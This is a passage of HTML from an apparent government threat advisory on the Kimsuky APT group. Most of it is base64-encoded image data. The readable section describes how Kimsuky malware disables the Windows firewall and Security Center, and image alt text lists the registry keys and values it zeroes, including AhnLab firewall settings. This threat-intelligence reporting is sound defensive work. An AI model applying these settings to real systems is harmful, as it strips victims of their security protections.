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" style="width: 312px; height: 399px;" /></font></font></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 1: Privileges set for the injection</em> [<a href="https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/">37</a>]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Defense Evasion</h4> <p>Kimsuky uses well-known and widely available methods for <em>Defense Evasion</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0005/">TA0005</a>] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">38</a>],[<a href="https://attack.mitre.org/groups/G0094/">39</a>]</p> <ul> <li>Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (<em>Impair Defenses: Disable or Modify System Firewall </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1562/004/">T1562.004</a>]).[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">40</a>]</li> </ul> <p align="center" style="text-align: center; margin-bottom: 8px;"><font color="#000000"><font face="Times New Roman"><img alt="Machine generated alternative text: 1 2 3 4 5 6 7 8 9 lø SYSTEMCurrentControlSetServicesSharedAccessParameters Fi rewal i cyStandardProfi le SYSTEMCurrentControlSetServicesSharedAccessParameters Fi rewal icyPublicProfile HKLMSOFTWAREAhnLabV31S2ØØ71nternetSec FWRunMode ø HKLMSOFTWAREAhn1abV31S8Øis fwmode ø " data-entity-type="" data-entity-uuid="" src="https://us-cert.cisa.govdata:image/png;base64,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